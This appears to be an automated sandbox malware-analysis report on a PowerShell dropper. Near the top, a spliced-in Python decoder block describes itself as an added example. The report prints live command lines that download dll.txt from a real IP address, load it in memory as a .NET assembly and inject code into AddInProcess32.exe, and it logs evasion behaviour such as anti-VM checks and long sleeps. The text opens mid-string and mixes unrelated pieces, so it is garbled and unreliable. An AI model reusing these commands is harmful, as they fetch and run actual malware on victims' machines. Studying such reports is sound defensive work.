'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
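The three encodings in the command lines above can be reversed offline. The following is an added example, not code from the report or from the sample: restore_alphabet undoes the stand-in substitution ('?' in the first-stage literal, '$$' in dll.txt) before base64 decoding, which is why the literal as it sits on the command line is not valid base64 until the script itself rewrites it; the -encodedCommand argument is ordinary UTF-16LE base64; and the first argument handed to TehulchesXxXxx.Class1.MsqBIbY is UTF-16LE base64 of a string stored backwards. STAGE1_PREFIX (the first 144 characters of the $IuJUJJZz literal), ENCODED_COMMAND and STAGE3_ARG are copied from the report; FAKE_ASSEMBLY and the dll.txt blob built from it are constructed, since the real dll.txt is not on the page.

```python
"""Decoders for the three encodings in the PowerShell chain above.
Added example; not code from the report or from the sample. Constants marked 'copied'
come from the report's command lines, the dll.txt sample is constructed."""
import base64
import string

B64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")

# Copied: first 144 characters of the $IuJUJJZz literal ('?' stands in for 'A').
STAGE1_PREFIX = (
    "WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?"
    "TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?"
    "bwBs?C??PQ?g?Fs?"
)
# Copied: -encodedCommand argument of the third powershell.exe.
ENCODED_COMMAND = (
    "IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgA"
    "XQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQA"
    "eAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUA"
    "bgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA=="
)
# Copied: first argument passed to TehulchesXxXxx.Class1.MsqBIbY.
STAGE3_ARG = (
    "dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIA"
    "YgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUA"
    "awBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA"
)


def restore_alphabet(blob: str, stand_in: str) -> str:
    """Undo the dropper's 'A' -> stand_in substitution.
    stand_in must lie outside the base64 alphabet, otherwise the reverse replacement
    would also rewrite legitimate characters and corrupt the decode."""
    if set(stand_in) & B64_ALPHABET:
        raise ValueError(f"{stand_in!r} overlaps the base64 alphabet")
    return blob.replace(stand_in, "A")


def b64_utf16(blob: str) -> str:
    """Strict base64 -> UTF-16LE text (the -EncodedCommand wire format).
    validate=True makes a blob whose stand-ins were not restored fail loudly instead
    of being decoded with the stray characters silently dropped."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def decode_stage1(literal: str) -> str:
    """First stage: '?' -> 'A', base64, UTF-16LE; yields the second PowerShell command."""
    return b64_utf16(restore_alphabet(literal, "?"))


def decode_dll_txt(text: str) -> bytes:
    """Second stage: dll.txt is base64 of the .NET assembly with every 'A' written as '$$'."""
    data = base64.b64decode(restore_alphabet(text, "$$"), validate=True)
    if data[:2] != b"MZ":
        raise ValueError("decoded dll.txt does not start with an MZ header")
    return data


def decode_encoded_command(arg: str) -> str:
    """Third powershell.exe: plain -encodedCommand, no stand-in character."""
    return b64_utf16(arg)


def decode_method_arg(arg: str) -> str:
    """First argument to MsqBIbY: UTF-16LE base64 of a string stored backwards."""
    return b64_utf16(arg)[::-1]


def encode_like_dropper(data: bytes, stand_in: str) -> str:
    """Build a dll.txt-style blob from raw bytes (used only for the constructed sample)."""
    return base64.b64encode(data).decode("ascii").replace("A", stand_in)


# Constructed stand-in for dll.txt: a fake MZ/PE header, not the real assembly.
FAKE_ASSEMBLY = b"MZ\x90\x00" + bytes(60) + b"PE\x00\x00" + bytes(16)
DLL_TXT_SAMPLE = encode_like_dropper(FAKE_ASSEMBLY, "$$")

if __name__ == "__main__":
    print(decode_stage1(STAGE1_PREFIX))
    print(decode_encoded_command(ENCODED_COMMAND).strip())
    print(decode_method_arg(STAGE3_ARG))
    print(len(decode_dll_txt(DLL_TXT_SAMPLE)), "bytes; 'A' left in blob:", "A" in DLL_TXT_SAMPLE)
```

Decoding with validate=True is the check worth keeping: Python's default b64decode discards characters outside the alphabet, so a blob whose stand-ins were not restored would decode to plausible-looking garbage instead of raising. The same '$$' handling applies to the downloaded dll.txt once it is pulled from the sandbox's dropped-file list, since the command line shows that file goes through the identical .replace before AppDomain.Load.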
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?B
v?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041BCE3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFAAC491D9F pushfd ; ret 13_2_00007FFAAC491FAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_004567E0 push eax; ret 15_2_004567FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_0045B9DD push esi; ret 15_2_0045B9E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00455EAF push ecx; ret 15_2_00455EC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00433FF6 push ecx; ret 15_2_00434009
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00406128 ShellExecuteW,URLDownloadToFileW,15_2_00406128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_00419BC4
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_0040E54F Sleep,ExitProcess,15_2_0040E54F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_004198C2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2065
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 830
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5149
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4584
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2754
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1805
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 2364
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 7226
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: foregroundWindowGot 1770
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016 Thread sleep count: 5149 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216 Thread sleep count: 4584 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536 Thread sleep time: -18446744073709540s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 Thread sleep count: 2754 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep count: 1805 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476 Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7560 Thread sleep count: 171 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7560 Thread sleep time: -85500s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564 Thread sleep count: 2364 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564 Thread sleep time: -7092000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564 Thread sleep count: 7226 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564 Thread sleep time: -21678000s >= -30000s
                  Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,15_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_0044D5E9 FindFirstFileExA,15_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,15_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00406AC2 FindFirstFileW,FindNextFileW,15_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,15_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,15_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00406F06
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp,
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmtoolsd
                  Source: powershell.exe, 00000007.00000002.1513412775.0000025F2893F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: PING.EXE, 0000000C.00000002.1349503253.000001B92B449000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe API call chain: ExitProcess graph end node graph_15-48241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041BCE3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00442554 mov eax, dword ptr fs:[00000030h] 15_2_00442554
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_0044E92E GetProcessHeap,15_2_0044E92E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00434168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00433B44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00433CD7 SetUnhandledExceptionFilter,15_2_00433CD7

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ;
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 457000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 470000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 476000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47B000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: FF0008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 15_2_00410F36
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 15_2_00418754 mouse_event,15_2_00418754
